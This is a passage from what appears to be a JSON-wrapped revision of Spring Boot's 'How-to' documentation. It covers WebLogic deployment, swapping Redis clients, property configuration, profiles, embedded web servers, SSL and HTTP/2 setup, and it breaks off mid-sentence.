so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to Spring\nBoot applications, and the previously mentioned guidance may help. However, you may yet\nencounter problems. In that case, we suggest\nhttps:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow\nwith a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version\nrather than the version that was pre-installed with the server. You can do so by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses\nhttps:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce]. You need to exclude that\ndependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead. Spring\nBoot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"lettuce\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"redis.clients:jedis\")\n\t\t\/\/ ...\n\t}\n----\n","old_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' questions\nthat often arise when using Spring Boot. Its coverage is not exhaustive, but it\ndoes cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out\nhttps:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer. This is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe are also more than happy to extend this section. If you want to add a '`how-to`',\nsend us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\n\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\nin a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations, and more. You can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If, for whatever reason, you cannot handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`\ncan simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but\nsometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),\nthere is also a `conditions` endpoint that renders the report in JSON. Use that endpoint\nto debug the application and see what features have been added (and which have not been\nadded) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. When\nreading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special\nattention to the `+@Conditional*+` annotations to find out what features they enable and\nwhen. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the\nconsole of all the auto-configuration decisions that were made in your app. In a running\nActuator app, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX\nequivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\nand read from there the available external configuration options. The\n`@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to\nexternal properties. Thus, `ServerProperties` has `prefix=\"server\"` and its configuration\nproperties are `server.port`, `server.address`, and others. In a running Actuator app,\nlook at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values\nexplicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\nresponse to SpEL expressions, normally evaluated with placeholders resolved from the\n`Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers`\nmethods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or\n`context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging\na jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some\neven before the context is created) and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n\"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`\" in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, the following example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. The preceding example adds the `custom-resource` property\nsource at the end of the list so that a key defined in any of the usual other locations\ntakes precedence. A custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a\nconvenient and easy way to load a custom resource in the `Environment`, we do not\nrecommend it, because Spring Boot prepares the `Environment` before the\n`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too\nlate to have any effect on auto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\"\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method but also bootstrap a Spring application to set up\nthe infrastructure to use, you can use the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether\nit thinks it needs a web application or not. The first thing you can do to help it is to\nleave server-related dependencies (e.g. servlet API) off the classpath. If you cannot do\nthat (for example, you run two applications from the same code base) then you can\nexplicitly call `setWebApplicationType(WebApplicationType.NONE)` on your\n`SpringApplication` instance or set the `applicationContextClass` property (through the\nJava API or with external properties). Application code that you want to run as your\nbusiness logic can be implemented as a `CommandLineRunner` and dropped into the context as\na `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\n\nThis section includes topics about setting and reading properties and configuration\nsettings and their interaction with Spring Boot applications.\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them by instead using the existing build\nconfiguration. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource\nfiltering. If you use the `spring-boot-starter-parent`, you can then refer to your\nMaven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is\napplied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add\n`src\/main\/resources` directly to the classpath (for hot reloading purposes). Doing so\ncircumvents the resource filtering and this feature. Instead, you can use the `exec:java`\ngoal or customize the plugin's configuration. See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `$\\{placeholder}`) in your configuration. If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. For example, in\n`application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application is not starting\nan embedded web server.\n\nProperties defined in external configuration override the values specified with the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses\nthree sources for the `ApplicationContext` (in the following order): `demo.MyApp`,\n`com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a\ndefined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this ordering is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods and those added using `setSources()` are inspected to see if they have\n`@PropertySources`. If they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added by using the default locations (such as\n`application.properties`), system properties, environment variables, or the command line.\n\nYou can also provide the following System properties (or environment variables) to change\nthe behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of\nthe file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a\nclasspath resource or a URL). A separate `Environment` property source is set up for this\ndocument and it can be overridden by system properties, environment variables, or the\ncommand line.\n\nNo matter what you set in the environment, Spring Boot always loads\n`application.properties` as described above. By default, if YAML is used, then files with\nthe '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can enable this behavior by using\nplaceholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is,\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled Maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttps:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other\ndelimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku\nor Cloud Foundry. In those two platforms, the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external\nproperties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis one level deep and has period-separated keys, as many people are used to with\n`Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).\nAlso, you can launch your application with a `-D` argument (remember to put it before the\nmain class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. This section answers those questions.\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including\n`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or\n`spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty\nby including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,\n`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies\nin addition to including the one you need. Spring Boot provides separate starters for\nHTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow\n2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring\nWebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\t\/\/ exclude Reactor Netty\n\t\tcompile.exclude module: 'spring-boot-starter-reactor-netty'\n\t}\n\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-webflux'\n\t\t\/\/ Use Undertow instead\n\t\tcompile 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so\nyou may need to keep a dependency on Netty even when you need to include a different HTTP\nserver.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will\nautomatically start it. To disable this behaviour configure the `WebApplicationType` in\nyour `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with\n`server.port` (for example, in `application.properties` or as a System property). Thanks\nto relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,\nas an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`,\nuse `server.port=-1`. (Doing so is sometimes useful for testing.)\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. The best way to get that and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Contrary to a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. Spring Boot does not support the configuration of\nboth an HTTP connector and an HTTPS connector through `application.properties`. If you\nwant to have both, you need to configure one of them programmatically. We recommend using\n`application.properties` to configure HTTPS, as the HTTP connector is the easier of the\ntwo to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the\n`+server.http2.enabled+` configuration property. This support depends on the chosen web\nserver and the application environment, since that protocol is not supported\nout-of-the-box by JDK8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol. So you\nmust <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0+, HTTP\/2 is supported without any additional requirement on JDK8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the\nhttps:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies:\n`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x which supports HTTP\/2 out of the box when\nusing JDK 9 or later. Alternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative`\nlibrary and its dependencies are installed on the host operating system.\n\nThe library folder must be made available, if not already, to the JVM library path. You\ncan do so with a JVM argument such as\n`-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`. More on this in the\nhttps:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-webflux-starter` is using by default Reactor Netty as a server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports\nHTTP\/2 with native libraries. To enable that, your application needs to have an\nadditional dependency.\n\nSpring Boot manages the version for the\n`io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for\nall platforms. Developers can choose to import only the required dependencies using\na classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official\ndocumentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\n\nGenerally, you should first consider using one of the many available configuration keys\nand customize your web server by adding new entries in your `application.properties` (or\n`application.yml`, or environment, etc. see\n\"`<<howto-discover-build-in-options-for-external-properties>>`\"). The `server.{asterisk}`\nnamespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,\n`server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<common-application-properties>>.\n\nThe previous sections covered already 